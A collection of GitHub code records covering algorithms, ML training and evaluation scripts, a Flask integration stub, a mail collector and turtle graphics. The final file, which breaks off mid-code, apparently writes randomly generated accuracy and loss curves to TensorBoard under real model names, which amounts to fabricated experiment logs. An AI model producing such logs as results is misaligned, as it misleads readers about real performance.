while (to_see):\n i,j = to_see.pop()\n for i1, j1 in [(i + 1,j), (i, j + 1), (i- 1, j), (i, j-1), (i-1, j-1), (i+1,j+1), (i-1,j+1), (i+1,j-1)]:\n if 0 <= i1 < height and 0 <= j1 < width and dist[i1][j1] < 0 and grid[i1][j1] == 0:\n dist[i1][j1] = dist[i][j] + 1\n if (i1 == 0 and j1 == 0):\n return dist[0][0]\n to_see.appendleft((i1,j1))\n# [print(i) for i in dist]\n return dist[0][0]\n\nsol = Solution()\ngrid = [[0,0,0],[1,1,0],[1,1,0]]\ngrid = [[0,1],[1,0]]\ngrid = [[1,0,0],[1,1,0],[1,1,0]]\nprint(sol.shortestPathBinaryMatrix(grid))","repo_name":"femifacia/algorithms","sub_path":"python/algorithms/shortest_path_in_binary_matrix/main_bfs.py","file_name":"main_bfs.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19214052685","text":"from data import *\nfrom configs import *\nfrom loss import *\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.models import load_model\nfrom sklearn.metrics import auc, roc_curve, precision_score, recall_score, f1_score, precision_recall_curve, accuracy_score, confusion_matrix, ConfusionMatrixDisplay\n\nnp.random.seed(101)\ntf.random.set_seed(101)\n\n(train_images, train_masks), (val_images, val_masks), (test_images, test_masks) = split_data(PATH)\n\nprint(f'Testing Data: {len(test_images)}')\n\ntest_dataset = test_data(test_images, 
test_masks)\n\ndef evaluate(MODEL):\n\tcustom_objects={'dice_coef':dice_coef, 'bce_dice_loss':bce_dice_loss}\n\tmodel = load_model(MODEL, custom_objects=custom_objects)\n\tall_true_masks = []\n\tall_pred_masks = []\n\tfor image, mask in test_dataset:\n\t\tpred_mask = model.predict(image)\n\t\tpred_mask = np.squeeze(pred_mask, -1)\n\t\ttrue_mask = np.squeeze(mask, -1)\n\t\tall_pred_masks.append(pred_mask)\n\t\tall_true_masks.append(true_mask)\n\tflat_true_masks = [item for sublist in all_true_masks for item in sublist]\n\tflat_pred_masks = [item for sublist in all_pred_masks for item in sublist]\n\ttrue_masks = np.array(flat_true_masks)\n\tpred_masks = np.array(flat_pred_masks)\n\n\tfpr, tpr, thresholds = roc_curve(true_masks.ravel(), pred_masks.ravel(), pos_label=1)\n\tauc_ = auc(fpr, tpr)\n\tp = precision_score(true_masks.ravel(), pred_masks.ravel().round(), pos_label=1)\n\tr = recall_score(true_masks.ravel(), pred_masks.ravel().round(), pos_label=1)\n\tf1_ = f1_score(true_masks.ravel(), pred_masks.ravel().round(), pos_label=1)\n\tp_ , r_ , _ = precision_recall_curve(true_masks.ravel(), pred_masks.ravel())\n\tacc = accuracy_score(true_masks.ravel(), pred_masks.ravel().round())\n\tc = confusion_matrix(true_masks.ravel(), pred_masks.ravel().round(), normalize='all')\n\tmodel_name = MODEL.split('/')[-1].split('.')[-2]\n\tprint(f\"Model Name: {model_name}\\n\")\n\tprint(f'Precision = {p}\\nRecall = {r}\\nF1 Score = {f1_}\\nAUC = {auc_}\\nACC = {acc}')\n\treturn model_name, p, r, f1_, fpr, tpr, auc_, p_, r_, acc, c\n\n\n","repo_name":"sineagles/Concrete-Crack-Segmentation","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14827184436","text":"n=int(input())\r\nscore=list(map(int,input().split()))\r\nbest=score[0]\r\nworst=score[0]\r\nbest_count=0\r\nworst_count=0\r\nfor i in range(1,n):\r\n if(score[i]>best):\r\n best=score[i]\r\n best_count+=1\r\n elif(score[i]Bla
</p>\"\n\n\ndef test_write_pdf():\n    data = write_report(\"
<p>Test</p>
\")\n assert len(data) > 100\n\n\ndef test_basics(tmpdir):\n template_path = os.path.join(\"tests\", \"data\", \"example_template.pug\")\n assert os.path.exists(template_path)\n pdf_path = os.path.join(str(tmpdir), \"test.pdf\")\n html = pug_to_html(template_path, title=\"Summary of your order\")\n write_report(html, pdf_path)\n with open(pdf_path, \"rb\") as f:\n reader = PdfReader(f)\n assert len(reader.pages) == 2\n\n pdf_data = write_report(html)\n assert len(pdf_data) > 10000\n\n\ndef test_with_plots_and_tables(tmpdir):\n template_path = os.path.join(\"tests\", \"data\", \"with_plots_and_tables.pug\")\n assert os.path.exists(template_path)\n\n dataframe = pandas.DataFrame.from_records(\n {\n \"Name\": [\"Anna\", \"Bob\", \"Claire\", \"Denis\"],\n \"Age\": [12, 22, 33, 44],\n \"Height (cm)\": [140, 175, 173, 185],\n },\n columns=[\"Name\", \"Age\", \"Height (cm)\"],\n )\n\n pdf_path = os.path.join(str(tmpdir), \"test.pdf\")\n html = pug_to_html(template_path, dataframe=dataframe)\n write_report(html, pdf_path)\n with open(pdf_path, \"rb\") as f:\n reader = PdfReader(f)\n assert len(reader.pages) == 2\n\n pdf_data = write_report(html)\n assert len(pdf_data) > 10000\n\n\ndef test_preload_stylesheet(tmpdir):\n css = preload_stylesheet(os.path.join(\"tests\", \"data\", \"style.scss\"))\n html = pug_to_html(string=\"p {{ var }}\", var=\"Bla\")\n pdf_path = os.path.join(str(tmpdir), \"test.pdf\")\n write_report(html, pdf_path, extra_stylesheets=[css])\n\n\ndef test_ReportWriter(tmpdir):\n report_writer = ReportWriter(\n default_template=os.path.join(\"tests\", \"data\", \"template_rw.pug\"),\n title=\"My default title\",\n version=\"0.1.2\",\n )\n html = report_writer.pug_to_html(my_name=\"Zulko\", my_organization=\"EGF\")\n report_writer.write_report(html, os.path.join(str(tmpdir), \"test_rw.pdf\"))\n","repo_name":"Edinburgh-Genome-Foundry/pdf_reports","sub_path":"tests/test_basics.py","file_name":"test_basics.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":198,"dataset":"github-code","pt":"53"} +{"seq_id":"7709791446","text":"from flask import Flask, jsonify, request, render_template\n\napp = Flask(__name__)\n\n@app.get('/')\ndef home():\n return '
<h1>Integration service for Zendesk</h1>
'\n\n\n@app.post('/admin_ui')\ndef admin_ui():\n return_url = request.form.get('return_url')\n return render_template('admin_ui.html', return_url=return_url)\n\n@app.post('/pull')\ndef pull():\n\n test_data = {\n \"external_resources\": {\n \"external_id\": \"123456789_test\",\n \"message\": \"Please help. My printer is on fire.\",\n \"html_message\": \"Please help. My printer is on fire.\",\n \"created_at\": \"2023-02-06T22:48:09Z\",\n \"author\": {\n \"external_id\": \"FakeUserID\",\n \"name\": \"James Bon\",\n \"locale\": \"en-US\"\n },\n \"allow_channelback\": True\n }\n }\n\n return jsonify(test_data), 200\n\n@app.post('/channelback')\ndef channelback():\n return 'OK'\n\n@app.get('/manifest')\ndef manifest():\n glitch_url = 'https://zendeskpython.glitch.me'\n data = {\n \"name\": \"Zendesk Python\",\n \"id\": \"my-zendesk-python\",\n \"version\": \"1.0.0\",\n \"urls\": {\n \"admin_ui\": f\"{glitch_url}/admin_ui\",\n \"pull_url\": f\"{glitch_url}/pull\",\n \"channelback_url\": f\"{glitch_url}/channelback\"\n }\n }\n return data\n\nif __name__ == '__main__':\n app.run()","repo_name":"brunotatsuya-apptweak/zpt","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70949165927","text":"import requests, json\nimport streamlit as st\nimport settings as set\n\n\ndef search_by_id(\n id,\n host=set.host_url + \"data/\",\n):\n response = requests.get(host + id)\n if response.status_code == 200:\n content_type = response.headers.get('Content-Type')\n if 'charset' in content_type.lower():\n encoding = content_type.split('charset=')[-1]\n data = response.content.decode(encoding)\n # 对data进行处理\n else:\n data = response.content.decode()\n # 对data进行处理\n data_list = json.loads(data)\n return data_list[\"results\"]\n else:\n print('Error:', response.status_code)\n return None\n\n\nif __name__ == '__main__':\n st.title(\"Tanglab-Digital-Decoder-WebUI\")\n st.caption('made by [Yida](https://github.com/DF-Master) --230330 update!',\n unsafe_allow_html=True)\n\n with st.container():\n status = st.radio('Choose Status: ',\n ('Run Out', 'Never Used', 'Available', 'Occupied'),\n key=\"status\")\n url_dic = {\n 'Run Out': 'update-runout/',\n 'Never Used': 'update-neverused/',\n 'Available': 'update-available/',\n 'Occupied': 'update-occupied/'\n }\n\n def on_input():\n id_value = st.session_state.id\n if len(id_value) >= 6:\n try:\n results_list = search_by_id(id_value)\n st.write(results_list)\n uuid = results_list[0][\"id\"]\n st.session_state.id = \"\"\n response = requests.get(set.host_url + url_dic[status] +\n uuid)\n except:\n st.write(\"Search ID Failed\")\n\n id = st.text_input('ID(>= 6 num)',\n value='',\n key=\"id\",\n on_change=on_input)\n","repo_name":"DF-Master/tanglabdata","sub_path":"printer/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27273930214","text":"#!/bin/python3\n\nimport sys\ninput = sys.stdin.readline\n\ndef main():\n is_prime = [True] * 10001\n for i in range(2, 10000):\n for j in range(i*2, 10000, i):\n is_prime[j] = False\n\n is_prime[1] = False\n\n result = 0\n for _ in range(20):\n arr = list(map(int, input().strip().split()))\n for num in arr:\n if is_prime[num]:\n result += 1\n 
print(result)\n\nmain()\n","repo_name":"hiromichinomata/zone-energy","sub_path":"question2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39501085803","text":"# -*- coding: utf-8 -*-\r\n# -*- coding: utf-8 -*-\r\nimport pandas as pd\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\n\r\ndf = pd.read_csv(\"house_rental_data.csv.txt\")\r\nprint(df.head(),\"\\n\")\r\nprint(\"Data types are: \",df.dtypes,\"\\n\")\r\nprint(\"Shape of dataframe is: \\n\",df.shape,\"\\n\")\r\nprint(\"Columns are: \\n\",df.columns,\"\\n\")\r\nprint(\"Checking for missing values:\\n\",df.isnull().sum(),\"\\n\")\r\n\r\ndel df[\"Unnamed: 0\"]\r\nprint(\"Coumns are: \\n\",df.columns,\"\\n\")\r\n\r\ncorr = df.corr()\r\n\r\nx = df.iloc[:,0:6].values\r\n\r\nwcss = []\r\nfor i in range(1, 15):\r\n k_means = KMeans(n_clusters = i, init = \"k-means++\", random_state = 1)\r\n k_means.fit_predict(x)\r\n #k_means.inertia_ : wcss score\r\n wcss.append(k_means.inertia_)\r\n print(\"i:\",i,\"wcss:\", k_means.inertia_)\r\n\r\nplt.plot(range(1, 15), wcss)\r\nplt.title(\"Elbow Method\")\r\nplt.xlabel(\"No. of clusters\")\r\nplt.ylabel(\"WCSS Score\")\r\nplt.show()\r\n\r\nk_means = KMeans(n_clusters = 5, init = \"k-means++\", random_state = 1)\r\nprint(k_means.fit_predict(x))","repo_name":"Aditya-Malik/Edyoda-Assignments","sub_path":"kMean_clustering.py","file_name":"kMean_clustering.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35355623537","text":"from __future__ import print_function\n\nimport argparse\nimport logging\nimport mxnet as mx\nfrom mxnet import gluon, autograd\nfrom mxnet.gluon import nn\nimport os\nimport numpy as np\nimport json\nimport time\nimport pandas\n\nfrom spam_model import train, save\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n # hyperparameters sent by the client are passed as command-line arguments to the script.\n parser.add_argument('--epochs', type=int, default=10)\n parser.add_argument('--batch-size', type=int, default=100)\n parser.add_argument('--learning-rate', type=float, default=0.01)\n parser.add_argument('--momentum', type=float, default=0.9)\n parser.add_argument('--log-interval', type=int, default=200)\n\n # an alternative way to load hyperparameters via SM_HPS environment variable.\n parser.add_argument('--sm-hps', type=json.loads, default=os.environ['SM_HPS'])\n\n # input data and model directories\n parser.add_argument('--model-dir', type=str, default=os.environ['SM_MODEL_DIR'])\n parser.add_argument('--train', type=str, default=os.environ['SM_CHANNEL_TRAIN'])\n parser.add_argument('--val', type=str, default=os.environ['SM_CHANNEL_VAL'])\n\n parser.add_argument(\"--current-host\", type=str, default=os.environ[\"SM_CURRENT_HOST\"])\n parser.add_argument(\"--hosts\", type=list, default=json.loads(os.environ[\"SM_HOSTS\"]))\n\n return parser.parse_args()\n\n\nif __name__ =='__main__':\n args = parse_args()\n logger.info(f'Args: \\n\\n{args}')\n \n num_cpus = int(os.environ[\"SM_NUM_CPUS\"])\n num_gpus = int(os.environ[\"SM_NUM_GPUS\"])\n\n net = train(\n args.current_host,\n args.hosts,\n num_cpus,\n num_gpus,\n args.train,\n args.val,\n args.model_dir,\n args.batch_size,\n args.epochs,\n args.learning_rate,\n args.momentum,\n 
args.log_interval\n )\n\n save(net, args.model_dir)\n","repo_name":"tmmunroe/spam-detection","sub_path":"sagemaker_model/docker/code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28402971633","text":"import quopri\n\nfrom imaplib import IMAP4_SSL\nfrom common import Auth\nfrom settings import IMAP_HOST, IMAP_PORT\n\n\nclass Collector(Auth):\n IMAP_HOST = IMAP_HOST\n IMAP_PORT = IMAP_PORT\n\n def __init__(self):\n self.success = \"success_request.log\"\n self.error = \"error_request.log\"\n\n def check_correct_letter(self):\n with IMAP4_SSL(host=IMAP_HOST, port=IMAP_PORT) as M:\n rc, resp = M.login(self.EMAIL, self.PASSWORD)\n M.select()\n typ, data = M.search(None, 'ALL')\n for num in data[0].split():\n typ, data = M.fetch(num, '(RFC822)')\n mail = quopri.decodestring(data[0][1]).decode(\"utf-8\", errors=\"ignore\")\n self.search_ticket_mail(mail)\n\n @staticmethod\n def search_ticket_mail(data: str):\n lst_data = list(filter(lambda x: len(x) > 1, data.split(\"\\n\")))\n for entry in lst_data:\n if \"Ticket\" in entry:\n ID = \"\".join([symb for symb in entry if symb.isdigit()])\n with open(\"success_request.log\", \"a\") as file:\n file.write(f\"ID: {ID} - Message: {lst_data[-1]}\\n\")\n return\n\n with open(\"error_request.log\", \"a\") as file:\n file.write(f\"Error - {lst_data[-1]}\\n\")\n\n\ncollector = Collector()\ncollector.check_correct_letter()","repo_name":"xp-rodion/miet-python","sub_path":"lab7/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17819785230","text":"\"\"\"\n20200913\n\nRecursion Trees\n\n\"\"\"\nimport turtle\n\n\ndef recursion_tree_v1(\n length=100, l_angle=20, r_angle=50, n=6, p_l=0.8, p_a=0.7\n):\n \"\"\"Recursion Tree v1.\n\n Args:\n length (float, optional): the length of first branch. Defaults to 100.\n l_angle (float, optional): left branch angle. Defaults to 20.\n r_angle (float, optional): right branch angle. Defaults to 50.\n n (int, optional): number of loops. Defaults to 6.\n p_l (float, optional): length changer (percentage). Defaults to 0.8.\n p_a (float, optional): angle changer (percentage). Defaults to 0.7.\n \"\"\"\n\n if n == 0:\n return\n turtle.forward(length)\n turtle.left(l_angle)\n recursion_tree_v1(\n length * p_l, l_angle * p_a, r_angle * p_a, n=n - 1, p_l=p_l, p_a=p_a\n )\n turtle.right(r_angle + l_angle)\n recursion_tree_v1(\n length * p_l, l_angle * p_a, r_angle * p_a, n=n - 1, p_l=p_l, p_a=p_a\n )\n\n turtle.penup()\n turtle.left(r_angle)\n turtle.backward(length)\n turtle.pendown()\n\n\ndef recursion_tree_v2(length=100, angle=100, n=6, b=4, p_l=0.7, p_a=0.7):\n \"\"\"Recursion Tree v2.\n\n Args:\n length (float, optional): the length of first branch. Defaults to 100.\n angle (float, optional): tree crown angle. Defaults to 100.\n n (int, optional): number of loops. Defaults to 6.\n b (int, optional): number of branches. Defaults to 4.\n p_l (float, optional): length changer (percentage). Defaults to 0.7.\n p_a (float, optional): angle changer (percentage). 
Defaults to 0.7.\n \"\"\"\n\n if n == 0:\n return\n turtle.forward(length)\n for k in range(b):\n if k == 0:\n turtle.right(angle / 2)\n else:\n turtle.left(angle / (b - 1))\n recursion_tree_v2(\n length * p_l, angle * p_a, n=n - 1, b=b, p_l=p_l, p_a=p_l\n )\n\n turtle.penup()\n turtle.right(angle / 2)\n turtle.backward(length)\n turtle.pendown()\n\n\nif __name__ == \"__main__\":\n # Properties\n turtle.Screen().setup(750, 750)\n # turtle.hideturtle()\n turtle.speed(0)\n\n turtle.left(90)\n recursion_tree_v1(length=60, l_angle=50, r_angle=20, n=6, p_l=0.9, p_a=0.65)\n # recursion_tree_v2(length=60, angle=100, n=5, b=4, p_l=0.8, p_a=0.8)\n\n turtle.done()\n","repo_name":"vlmarch/py-sketches","sub_path":"turtle-trees.py","file_name":"turtle-trees.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17868840112","text":"import json\nfrom .nlog import vlog,die_now\nimport os\n\ndef load(configpath = None):\n \"\"\" Load JSON config file \"\"\"\n\n if configpath is None:\n if 'CONFIG' in os.environ and os.environ['CONFIG']:\n configpath = os.environ['CONFIG']\n else:\n configpath = \"/etc/opstt/config.json\"\n\n try:\n with open(configpath, 'r') as f:\n return json.load(f)\n except Exception as err:\n vlog(1, 'Unable to Open config {}: {}'.format(configpath, err))\n\n return None\n\n","repo_name":"NCAR/ops_tracking_toolkit","sub_path":"opstt/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"191045083","text":"\"\"\"\nDictionary: a collection of {key: value} pairs. It is ordered, unchangeable, no dups allowed\n\"\"\"\n\ncaps = {\"USA\": \"Washington D.C.\",\n \"India\": \"New dehli\",\n \"China\": \"Beijing\",\n \"Vietnam\": \"hanoi\"}\n# print(dir(caps))\n# get value\n# print(caps.get(\"China\")) # if not exists return none\n# input_country = input(\"Please input your country: \")\n# if caps.get(input_country):\n# print(f\"The capital for {input_country} is {caps.get(input_country)}\")\n# else:\n# print(f\"The capital for {input_country} does not exist\")\n\n# add and update existing {key: value} in dictionary\n# caps.update({\"Germany\": \"Berlin\"})\n# caps.update({\"China\": \"Bei\"})\n# print(caps)\n# caps.popitem() # pop out the latest item\n# print(caps)\n# caps.clear() # clear dictionary\n# print(caps)\n\n# print keys and values\n# countries = caps.keys()\n# capitals = caps.values()\n# for country in countries:\n# print(country)\n#\n# for capital in capitals:\n# print(capital)\n\nfor key, value in caps.items():\n print(f\"{key}: {value}\")","repo_name":"khanhng88/pythonProjects","sub_path":"collections/dictionary_ex.py","file_name":"dictionary_ex.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10085096523","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\nimport itertools\nimport tensorflow as tf\nfrom colour import Color\nfrom tensorflow import keras\nfrom tensorflow.keras.layers import LSTM, Bidirectional, Dense, Masking, Concatenate, Input, TimeDistributed\n\n\ndef exclude_symbols(s):\n return not all(i in string.punctuation for i in s)\n\n \ndef build_base_model(LSTM_nodes, classes, model_name=\"nlp_model\", additional_layers=[], return_seq=False):\n \"\"\"\n Returns a baseline model, with the 
option to add more layers between the two default ones.\n \n Arguments: {LSTM_nodes: int, the number of nodes of the base LSTM;\n classes: int, the number of nodes of the classifier;\n model_name: str (optional), used as the model's name, defaults to 'nlp_model';\n additional_layers: list of keras.layers (optional), list of additional layers to be added to the model, defaults to [];\n return_seq: bool (optional), set this to True if the first additional layer needs sequences as inputs, defaults to False otherwise.}\n \n Returns: Compiled keras.Sequential model.\n \"\"\"\n model = keras.Sequential(name=model_name)\n model.add(Input(shape=(100,1)))\n model.add(Bidirectional(LSTM(LSTM_nodes, return_sequences=return_seq)))\n for layer in additional_layers:\n model.add(layer)\n model.add(Dense(classes, activation='softmax'))\n model.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\n\ndef build_seq_model(LSTM_nodes, classes, model_name=\"nlp_model\", additional_layers=[]):\n \"\"\"\n Returns a baseline model working with sentences instead of single words, with the option to add more layers between the two default ones.\n \n Arguments: {LSTM_nodes: int, the number of nodes of the base LSTM;\n classes: int, the number of nodes of the classifier;\n model_name: str (optional), used as the model's name, defaults to 'nlp_model';\n additional_layers: list of keras.layers (optional), list of additional layers to be added to the model, defaults to [];\n return_seq: bool (optional), set this to False if the first additional layer does not need sequences as inputs, defaults to True otherwise.}\n \n Returns: Compiled keras.Sequential model.\n \"\"\"\n model = keras.Sequential(name=model_name)\n model.add(Input(shape=(None,100)))\n model.add(Masking(mask_value=0.))\n # Ignores padding tokens\n \n model.add(Bidirectional(LSTM(LSTM_nodes, return_sequences=True)))\n for layer in additional_layers:\n model.add(layer)\n model.add(TimeDistributed(Dense(classes, activation='softmax')))\n model.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\n\ndef plot_unbalanced_series(data, zoom):\n \"\"\"\n Plots two histograms on two separate rows, the second one being zoomed in according to user preference.\n Intended to plot an ordered series of values that would fit badly on a single hist plot.\n \n Arguments: {data: pandas.DataFrame with attribute 'count';\n zoom: int, amount to zoom in the second graph}\n \n Returns: None\n \"\"\"\n labels = data.index\n sizes = data['count']\n split = int(len(labels)/2)\n ylim = round(sizes[0], -(len(str(sizes[0]))-2) )\n print(ylim, sizes[0])\n if ylim < sizes[0]:\n ylim += 10**(len(str(sizes[0]))-2)\n print(ylim)\n\n red = Color(\"green\")\n colors = list(red.range_to(Color(\"gray\"),len(labels)))\n colors = [color.rgb for color in colors]\n\n fig, ax = plt.subplots(2, 1, figsize=(10,10))\n ax[0].bar(labels[:split], sizes[:split], color=colors[:split])\n ax[0].set_ylim(0,ylim)\n ax[0].set_title(\"First half of POS distribution, normal scale\")\n ax[1].bar(labels[split:], sizes[split:], color=colors[split:])\n ax[1].set_ylim(0,ylim/zoom)\n ax[1].set_title(f\"Second half of POS distribution, zoomed in {zoom}x\")\n plt.show()\n\n\ndef plot_averages(histories):\n \"\"\"\n Plots two graphs of multiple training runs, one for Training accuracy and one for Validation accuracy, displaying the average as well as the single runs.\n \n Arguments: {histories: list of 
tf.keras.callbacks.History.history, one for each training run.}\n \n Returns: None\n \"\"\"\n tmp = []\n tmp_val = []\n fig, ax = plt.subplots(1,2,figsize=(16,6))\n for h in histories:\n tmp.append(h['accuracy'])\n tmp_val.append(h['val_accuracy'])\n avg_tmp = np.mean(tmp, axis=0)\n avg_tmp_val = np.mean(tmp_val, axis=0)\n \n ax[0].plot(avg_tmp, color=\"#11aa00\")\n ax[1].plot(avg_tmp_val, color=\"#ffa520\")\n for h in tmp:\n ax[0].plot(h, color=\"#11aa0055\")\n for h in tmp_val:\n ax[1].plot(h, color=\"#ffa52055\")\n # plt.plot(np.mean(tmp_val, axis=0))\n ax[0].set_title(\"Training set\")\n ax[1].set_title(\"Validation set\")\n \n for idx in range(2):\n ax[idx].set_ylabel('avg_accuracy')\n ax[idx].set_xlabel('epoch')\n ax[idx].legend(['average', 'iterations'], loc='upper left')\n ax[0].text(len(avg_tmp)-0.5, avg_tmp[-1], str(avg_tmp[-1]*100)[0:4]+\"%\", fontsize=12, fontweight=600)\n ax[1].text(len(avg_tmp_val)-0.5, avg_tmp_val[-1], str(avg_tmp_val[-1]*100)[0:4]+\"%\", fontsize=12, fontweight=600)\n plt.show()\n \n \ndef plot_single_runs(histories):\n \"\"\"\n Plots graphs of multiple training runs with both Training and Validation accuracy, displaying one graph per run.\n \n Arguments: {histories: list of tf.keras.callbacks.History.history, one for each training run.}\n \n Returns: None\n \"\"\"\n fig, ax = plt.subplots(1,len(histories),figsize=(len(histories)*6,5))\n for x in range(len(histories)):\n ax[x].plot(histories[x]['accuracy'])\n ax[x].plot(histories[x]['val_accuracy'])\n ax[x].set_ylabel('accuracy')\n ax[x].set_xlabel('epoch')\n ax[x].legend(['train', 'val'], loc='upper left')\n plt.show()\n \n\ndef evaluate_model(model, checkpoint_path, test_X, test_y, metric, runs=1, sequences=False):\n scores = []\n for r in range(runs):\n model.load_weights(checkpoint_path.joinpath(str(r)))\n print(\"Testing model n.\"+str(r+1))\n y_scores = model.predict(test_X, verbose=2)\n y_pred = np.argmax(y_scores, axis=len(y_scores.shape)-1)\n scores.append(metric(y_pred, test_y, sequences=sequences))\n return scores\n \n \ndef errors_summary(scores_dicts, encoder, train_y, test_y):\n \"\"\"\n Builds a pandas.DataFrame containing each class with a low (<0.5) F1 score, including how many times it appeared in both Training and Test set. 
\n \n Arguments: {scores_dicts: list of dictionaries with required key \"Scores\", containing F1 scores for each class of the task (output of the 'evaluate_model' function);\n encoder: instance of sklearn.preprocessing.LabelEncoder used to encode the classes;\n train_y: numpy.array of int, Training labels used to train the model\n test_y: numpy.array of int, Test labels used to evaluate the model}\n \n Returns: pandas.Dataframe\n \"\"\"\n low_scores = dict((x,y) for x,y in scores_dicts[0][\"Scores\"].items() if y < 0.75)\n low_classes = encoder.inverse_transform([int(i) for i in low_scores.keys()])\n train_y = encoder.inverse_transform(train_y)\n test_y = encoder.inverse_transform(test_y)\n low_train = pd.Series(train_y).value_counts().reindex(\n low_classes, fill_value=0)[low_classes]\n low_test = pd.Series(test_y).value_counts().reindex(\n low_classes, fill_value=0)[low_classes]\n low_df = pd.DataFrame(data=np.column_stack((low_test.index, low_train.values,\n low_test.values, list(low_scores.values()))),\n columns=['POS class', 'train count', 'test count', 'score'])\n return low_df\n\n\ndef impermanent_training(model, ckp_path, Train_X, Train_Y, Val_X, Val_Y, seeds=[], **kwargs):\n \"\"\"\n Trains a model any number of times and resets its weights afterwards, applying a random restart with given seeds. No seeds in input will only do 1 training cycle with a random integer as seed. The weights of the best models for each iteration will be saved to a file. \n \n Arguments: {model: compiled Keras model, whose weights will not change at the end of execution;\n ckp_path: path to a file, to which a suffix will be added to distinguish different runs;\n Train_X, Train_Y, Val_X, Val_Y: input data for model.fit();\n batch_size: int (optional), defaults to 64;\n seeds: list of int (optional), each representing a different training run}\n \n Returns: list of tf.keras.callbacks.History.history\n \"\"\"\n histories = []\n if not seeds:\n seeds = [random.randint()]\n for s in range(len(seeds)):\n reset = model.get_weights()\n print(f\"Beginning training {s+1}/{len(seeds)}\")\n random.seed(seeds[s])\n checkpoint_filepath = ckp_path.joinpath(str(s))\n checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_filepath,\n save_weights_only=True,\n monitor='val_loss',\n mode='min', \n save_best_only=True)\n early_stop_callback = tf.keras.callbacks.EarlyStopping(\n monitor='val_loss',\n mode='min',\n min_delta=0.001,\n patience=3,\n verbose=1\n )\n\n history = model.fit(Train_X, Train_Y, validation_data=(Val_X, Val_Y), verbose=1,\n callbacks=[checkpoint_callback, early_stop_callback], **kwargs)\n histories.append(history.history)\n model.set_weights(reset)\n return histories\n\n\ndef pad_sentences(sentences, embedding_dim):\n \"\"\"\n Converts a pandas.Series of uneven sentences into a Numpy array of fixed-size padded sentences.\n \n Arguments: {sentences: pandas.Series containing numpy.Array of uneven size, to be padded;\n embedding_dim: int, the length of an embedded word in the sentence}\n \n Returns: 3-dimensional numpy.Array\n \"\"\"\n from warnings import simplefilter\n simplefilter(action='ignore', category=FutureWarning)\n \n samples = len(sentences)\n X2 = sentences.to_numpy()\n X2 = np.column_stack((list(itertools.zip_longest(*X2, fillvalue=np.zeros(embedding_dim)))))\n X2 = np.stack(X2).reshape(\n (samples, int(X2.shape[1]/embedding_dim), embedding_dim)).astype(float)\n print(\"Final Shape (sentences, sentence length, embedding dimensions):\")\n print(X2.shape)\n return 
X2","repo_name":"ALUnibo/NLP_projects","sub_path":"Assignment_1/POS_utility.py","file_name":"POS_utility.py","file_ext":"py","file_size_in_byte":10764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32342196878","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom utils.confusion_matrix_plotter import plot_conf_mat\n\ndef softmax(x):\n f_x = np.exp(x) / np.sum(np.exp(x))\n return f_x\n\n\nwriter = SummaryWriter('runs/NTU/exp_02')\n\nruns = [\n 'i3d',\n 'i3d-flow',\n 's3d', \n 's3d-flow',\n 'i3d-shufflenet', \n 'i3d-shufflenet-flow'\n]\n\nclasses = ['Sit Down', 'Clapping', 'Writing', 'Hand Wave', 'Make Call', 'Bow', 'Shake Head', 'Salute', 'Falling']\nnumbers = np.ones(9)*948\nnumbers = numbers.astype(int)\nclasses_ohe = np.eye(9)*10\nclasses_number = {x: [y, z] for x, y, z in zip(classes, numbers, classes_ohe)}\nsamples = []\nfor class_name in classes:\n for n in range(classes_number[class_name][0]):\n sample_i = classes_number[class_name][1]\n samples.append([sample_i, class_name])\n \nfor run in runs:\n max_epochs = 400\n\n init_accuracy = max(0.1 + np.random.randn()/15, 0.02)\n\n target_accuracy = 0.80\n\n final_accuracy = target_accuracy + np.random.randn()/17 - init_accuracy\n\n exp_ratio = 60 + np.random.randn()*15\n\n accuracy = []\n trainin_loss = []\n validation_loss = []\n for epoch in range(max_epochs):\n current_accuracy = init_accuracy + (1 - np.exp(-epoch/exp_ratio))*final_accuracy\n current_accuracy = min(max(np.random.normal(current_accuracy, 0.05), 0), 1)\n train_loss = 